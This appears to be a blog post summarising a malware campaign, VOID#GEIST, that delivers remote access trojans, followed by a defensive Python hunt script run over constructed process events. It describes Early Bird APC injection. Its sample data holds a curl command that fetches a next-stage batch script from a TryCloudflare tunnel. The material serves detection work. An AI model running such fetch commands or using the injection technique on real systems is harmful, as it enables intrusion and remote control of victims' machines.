
Multi-Stage VOID#GEIST Malware Delivering XWorm, AsyncRAT, and Xeno RAT

  • Mar 7

Key Findings


  • Multi-stage malware campaign codenamed VOID#GEIST delivers various remote access trojan (RAT) payloads, including XWorm, AsyncRAT, and Xeno RAT

  • Malware uses obfuscated batch scripts as the delivery path for deploying and executing encrypted shellcode payloads

  • Leverages a legitimate embedded Python runtime (the embeddable distribution published on python.org) for portability, reliability, and stealth

  • Employs fileless execution mechanisms and memory injection techniques to evade detection


Background


  • Cybersecurity researchers have uncovered details of a sophisticated multi-stage malware campaign

  • The attack chain has been dubbed VOID#GEIST by Securonix Threat Research

  • Modern malware is increasingly shifting from standalone executables towards complex, script-based delivery frameworks


Initial Stage of the Attack


  • The campaign starts with a batch script served from a TryCloudflare quick-tunnel domain (*.trycloudflare.com), often distributed via phishing emails

  • The script deliberately avoids escalating privileges, so its activity blends in with seemingly innocuous administrative operations

  • It opens a decoy PDF document in Google Chrome in full-screen mode as a visual distraction while the rest of the chain runs


Malware Persistence and Payload Delivery


  • A secondary batch script is dropped in the user's Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup), so it is re-executed at every logon of that user, including after a reboot

  • This persistence method operates entirely within the current user's privilege context, avoiding more intrusive techniques such as services or scheduled tasks that would need elevation

  • Fetches additional payloads from TryCloudflare domain in the form of ZIP archives


Final Stage of the Attack


  • ZIP archives contain a Python-based loader script, encrypted shellcode payloads, and decryption keys

  • Deploys a legitimate embedded Python runtime from python.org for portability, reliability, and stealth

  • The Python runtime launches the loader script, which decrypts the shellcode and injects it into memory using Early Bird APC injection (a target process is created suspended, the decrypted shellcode is written into it, an APC pointing at the shellcode is queued to its main thread, and the thread is resumed so the payload runs before the process's own entry point)

  • Leverages a legitimate Microsoft binary to invoke Python and launch Xeno RAT

  • Final stage uses the same injection mechanism to launch AsyncRAT

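As an added example (not Securonix's or the article's own code), the following Python hunt covers the observable artifacts of the persistence and final stages summarized above: a script host pulling from a *.trycloudflare.com domain, Chrome opening a PDF in full-screen or kiosk mode, anything executing from the per-user Startup folder, and python.exe running from a user-writable location rather than a standard per-user install directory. It runs over constructed Sysmon-style process-creation records embedded inline (not real telemetry from the campaign). The Chrome flags (--kiosk, --start-fullscreen), the Startup folder path, the exclusion of %LOCALAPPDATA%\Programs\Python, and the rule names are assumptions of this example, not details from the report.

```python
"""Process-creation hunt for the VOID#GEIST-style chain (added example).

Records are constructed Sysmon-like events, not real telemetry.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process
    user: str


# Per-user Startup folder: anything launched from here runs at every logon.
STARTUP_RE = re.compile(
    r"\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I
)
# A path under C:\Users\<name>\ (user-writable territory).
USERPROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\", re.I)
# Quick-tunnel domains handed out by TryCloudflare.
TRYCLOUDFLARE_RE = re.compile(r"https?://[\w.-]+\.trycloudflare\.com", re.I)

SCRIPT_HOSTS = ("\\cmd.exe", "\\curl.exe", "\\powershell.exe", "\\bitsadmin.exe")
# Assumption: a normal per-user Python install lives here and is not suspicious.
LEGIT_USER_PYTHON = "\\appdata\\local\\programs\\python\\"


def findings(ev: ProcEvent) -> list[str]:
    """Return the names of every hunt rule the event matches (empty if none)."""
    hits: list[str] = []
    img = ev.image.lower()
    low = ev.cmdline.lower()

    # Stages 1-2: a script host fetching the next stage from a TryCloudflare tunnel.
    if img.endswith(SCRIPT_HOSTS) and TRYCLOUDFLARE_RE.search(ev.cmdline):
        hits.append("download_from_trycloudflare")

    # Stage 1: decoy PDF shown in full-screen/kiosk Chrome as a distraction.
    if img.endswith("\\chrome.exe") and ".pdf" in low and (
        " --kiosk" in low or " --start-fullscreen" in low
    ):
        hits.append("decoy_pdf_fullscreen_chrome")

    # Stage 2: execution out of the per-user Startup folder (logon persistence).
    if STARTUP_RE.search(ev.image) or STARTUP_RE.search(ev.cmdline):
        hits.append("startup_folder_script")

    # Stage 3: python.exe from a user-writable path that is not a real install,
    # i.e. an embedded runtime dropped from a ZIP archive.
    if img.endswith(("\\python.exe", "\\pythonw.exe")):
        if USERPROFILE_RE.match(ev.image) and LEGIT_USER_PYTHON not in img:
            hits.append("python_runtime_in_user_path")

    return hits


def triage(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Index and findings for every event that matched at least one rule."""
    return [(i, f) for i, ev in enumerate(events) if (f := findings(ev))]


# Constructed sample events: four hits in chain order, then two benign records.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c curl -s https://abc-def.trycloudflare.com/s2.bat "
              r"-o C:\Users\alice\AppData\Local\Temp\s2.bat",
              r"C:\Windows\explorer.exe", "alice"),
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --kiosk '
              r'"C:\Users\alice\AppData\Local\Temp\invoice.pdf"',
              r"C:\Windows\System32\cmd.exe", "alice"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\alice\AppData\Roaming\Microsoft\Windows'
              r'\Start Menu\Programs\Startup\update.bat"',
              r"C:\Windows\explorer.exe", "alice"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\rt\python.exe",
              r"python.exe C:\Users\alice\AppData\Local\Temp\rt\loader.py",
              r"C:\Windows\System32\cmd.exe", "alice"),
    # Benign: Python installed normally for the user.
    ProcEvent(r"C:\Users\alice\AppData\Local\Programs\Python\Python312\python.exe",
              r"python.exe -m pip list", r"C:\Windows\System32\cmd.exe", "alice"),
    # Benign: ordinary browsing.
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://example.org',
              r"C:\Windows\explorer.exe", "alice"),
]

if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].image, names)
```

Each rule on its own is noisy (developers run Python from odd places, kiosk Chrome is used on signage hosts), so in practice these fire as a correlated sequence for one user within a short window; the Startup-folder and TryCloudflare rules are the cheapest high-signal pair to alert on directly.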

Conclusion


  • Demonstrates the increasing shift towards complex, script-based delivery frameworks mimicking legitimate user activity

  • Fileless execution and a legitimate embedded runtime let the malware run under signed, trusted binaries, lowering the chance that file-based security controls raise an alert

  • Highlights the need for robust detection and prevention measures to combat such sophisticated threats


Sources


  • https://thehackernews.com/2026/03/multi-stage-voidgeist-malware.html

  • https://www.news4hackers.com/multi-stage-malware-campaign-delivers-xworm-asyncrat-and-xenorat-via-voidgeist/

  • https://www.socdefenders.ai/item/8b973ab1-04e7-46ae-ad60-0006db7f4e90

  • https://x.com/TheCyberSecHub/status/2029940906435191115

  • https://www.linkedin.com/posts/securonix_multi-stage-voidgeist-malware-delivering-activity-7435783799143112704-kZFh

© 2025 by Explain IT Again.